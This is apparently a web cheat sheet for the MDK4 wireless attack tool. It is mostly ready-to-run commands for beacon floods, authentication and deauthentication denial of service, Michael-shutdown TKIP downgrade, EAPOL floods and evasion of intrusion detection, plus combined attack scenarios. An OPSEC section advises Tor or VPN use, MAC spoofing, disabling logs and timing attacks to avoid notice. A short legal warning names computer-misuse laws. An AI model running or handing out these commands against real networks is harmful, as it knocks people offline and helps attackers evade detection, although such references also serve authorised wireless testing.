MDK4
Installation
섹션 제목: “Installation”# Install dependencies (Ubuntu/Debian)
sudo apt-get install build-essential libpcap-dev aircrack-ng
# Clone and compile MDK4
git clone https://github.com/aircrack-ng/mdk4.git
cd mdk4
make
sudo make install
# Verify installation
mdk4 --versionMonitor Mode Setup
섹션 제목: “Monitor Mode Setup”# Check wireless interfaces
iwconfig
ip link show
# Enable monitor mode on wlan0
sudo airmon-ng start wlan0
# Or manually with iw (creates wlan0mon)
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
# Verify monitor mode active
iwconfig
# Output should show "Mode:Monitor"
# Disable monitor mode
sudo airmon-ng stop wlan0mon
# Or manually revert
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 upBasic Usage
섹션 제목: “Basic Usage”# Help and version info
mdk4 --help
mdk4 --version
# List available attack modes
mdk4 wlan0mon --help
# General syntax
mdk4 <interface> <attack_mode> [options] <target>Attack Modes
섹션 제목: “Attack Modes”Beacon Flood (b)
섹션 제목: “Beacon Flood (b)”Flood network with fake beacons, creating ghost networks and confusing clients.
# Basic beacon flood on all channels
mdk4 wlan0mon b
# Beacon flood with custom SSID file
mdk4 wlan0mon b -f ssid_list.txt
# Flood specific channel
mdk4 wlan0mon b -c 6
# Flood multiple channels
mdk4 wlan0mon b -c 1,6,11
# Set beacon interval (milliseconds)
mdk4 wlan0mon b -i 100
# Specify output interface (if multiple)
mdk4 wlan0mon b -B wlan0monAuthentication DoS (a)
섹션 제목: “Authentication DoS (a)”Flood target with authentication requests, exhausting AP resources.
# Basic authentication DoS
mdk4 wlan0mon a -t <target_BSSID>
# Auth DoS on specific channel
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -c 6
# Flood with custom auth rate (packets/sec)
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -n 100
# Target multiple APs
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -t 11:22:33:44:55:66SSID Probing (p)
섹션 제목: “SSID Probing (p)”Broadcast probe requests for networks in a wordlist, testing for hidden SSIDs.
# Probe with SSID list
mdk4 wlan0mon p -f wordlist.txt
# Probe specific SSID
mdk4 wlan0mon p -s "MyNetwork"
# Probe on single channel
mdk4 wlan0mon p -f wordlist.txt -c 6
# Specify probe interval (milliseconds)
mdk4 wlan0mon p -f wordlist.txt -i 50Deauthentication/Disassociation (d)
섹션 제목: “Deauthentication/Disassociation (d)”Force clients to disconnect from target AP.
# Deauth all clients on target AP
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF
# Deauth specific client
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Deauth with custom frame count
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 -n 100
# Deauth on specific channel
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -C 6Michael Shutdown (m)
섹션 제목: “Michael Shutdown (m)”Trigger Michael frame errors to disable TKIP encryption and force downgrade.
# Basic Michael shutdown
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF
# Michael attack on specific client
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Set attack rate
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF -n 100EAPOL Start (e)
섹션 제목: “EAPOL Start (e)”Send EAPOL Start frames to initiate authentication handshakes.
# Basic EAPOL Start flood
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF
# EAPOL with custom source MAC
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF -s 00:11:22:33:44:55
# Set EAPOL interval
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF -i 50WIDS/IPS Evasion (w)
섹션 제목: “WIDS/IPS Evasion (w)”Exploit WIDS (Wireless Intrusion Detection) by sending fuzzy/malformed frames.
# WIDS confusion mode
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF
# Fuzzy frame generation
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF --fuzzy
# Target specific WIDS sensor
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF -c 6Targeting and Filtering
섹션 제목: “Targeting and Filtering”# Target specific AP by BSSID
mdk4 wlan0mon b -t AA:BB:CC:DD:EE:FF
# Target specific client MAC
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Exclude specific BSSID
mdk4 wlan0mon b --bssid-file exclude.txt
# Target by SSID name (if known)
mdk4 wlan0mon d -s "TargetNetwork"
# Multiple targets
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -t 11:22:33:44:55:66 -t 99:88:77:66:55:44Channel Selection and Frequency
섹션 제목: “Channel Selection and Frequency”# Single channel
mdk4 wlan0mon b -c 6
# Multiple channels
mdk4 wlan0mon b -c 1,6,11,36,40,44,48
# All 2.4GHz channels
mdk4 wlan0mon b -c 1-13
# 5GHz UNII bands
mdk4 wlan0mon b -c 36-165
# No channel restriction (all bands)
mdk4 wlan0mon bRate Control and Timing
섹션 제목: “Rate Control and Timing”# Set frame rate (packets per second)
mdk4 wlan0mon b -n 1000
# Millisecond interval between frames
mdk4 wlan0mon b -i 10
# Slow rate for OPSEC
mdk4 wlan0mon b -n 50 -i 100
# Aggressive rate
mdk4 wlan0mon b -n 5000 -i 1MAC Spoofing and Source Control
섹션 제목: “MAC Spoofing and Source Control”# Custom source MAC for beacons
mdk4 wlan0mon b -s 00:11:22:33:44:55
# Random MAC per frame
mdk4 wlan0mon b --random-mac
# Fixed BSSID in beacons
mdk4 wlan0mon b -B AA:BB:CC:DD:EE:FFAdvanced Options
섹션 제목: “Advanced Options”# Verbose output
mdk4 wlan0mon b -v
# Show packet details
mdk4 wlan0mon b -d
# Duration/time limit (seconds)
timeout 300 mdk4 wlan0mon b
# Output to file for analysis
mdk4 wlan0mon b -o attack.log
# Background execution
mdk4 wlan0mon b &OPSEC and Legal Considerations
섹션 제목: “OPSEC and Legal Considerations”Legal Warning
섹션 제목: “Legal Warning”MDK4 performs DoS attacks against wireless networks. Only use on networks you own or have explicit written permission to test. Unauthorized use violates:
- Computer Fraud and Abuse Act (CFAA) in US
- Computer Misuse Act in UK
- Similar laws in most jurisdictions
Operational Security
섹션 제목: “Operational Security”# Use VPN/Tor if testing remote networks (never your home IP)
# Spoof MAC address to avoid tracking
sudo macchanger -r wlan0mon
# Use minimal output to reduce detection
mdk4 wlan0mon b -c 6 > /dev/null
# Disable logging of attacks
mdk4 wlan0mon b --nolog
# Time attacks during high traffic periods
# Launch during peak hours (less suspicious)
# Exit cleanly and restore interface
sudo airmon-ng stop wlan0mon
sudo systemctl restart networkingDetection Avoidance
섹션 제목: “Detection Avoidance”- Vary attack parameters (channels, rates, timing)
- Avoid flooding from single source MAC
- Rotate attack modes to appear as multiple actors
- Do not target production networks during business hours
- Leave adequate gaps between attacks
- Monitor for WIDS alerts during testing
Combined Attack Scenarios
섹션 제목: “Combined Attack Scenarios”# Multi-channel beacon flood with custom SSIDs
mdk4 wlan0mon b -f wordlist.txt -c 1-13 -n 500
# Deauth + beacon flood (run in parallel)
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF &
mdk4 wlan0mon b -c 6 &
wait
# SSID enumeration + probe analysis
mdk4 wlan0mon p -f wordlist.txt -v
# Michael shutdown before deauth
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF &
sleep 5
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF &
waitTroubleshooting
섹션 제목: “Troubleshooting”| Issue | Solution |
|---|---|
| ”wlan0mon: No such device” | Run sudo airmon-ng start wlan0 to create monitor interface |
| Attacks fail silently | Check iwconfig for Monitor mode, verify channel, try -v flag |
| High CPU usage | Reduce rate (-n) or interval (-i) values |
| Packets not sending | Disable software encryption: sudo rfkill unblock all |
| Cannot target specific AP | Verify BSSID with sudo airodump-ng wlan0mon first |
| Connection to WIDS/IPS | Use fuzzy mode (w --fuzzy) or vary channels/rates |
Related Tools
섹션 제목: “Related Tools”- aircrack-ng — Full WiFi security suite (airodump, aireplay, airmon)
- hashcat — Password cracking for captured handshakes
- Wireshark — Packet analysis and inspection
- hcxdumptool — Extract hash-mode 22000 from PCAP for hashcat
- hostapd — Create rogue AP for evil twin attacks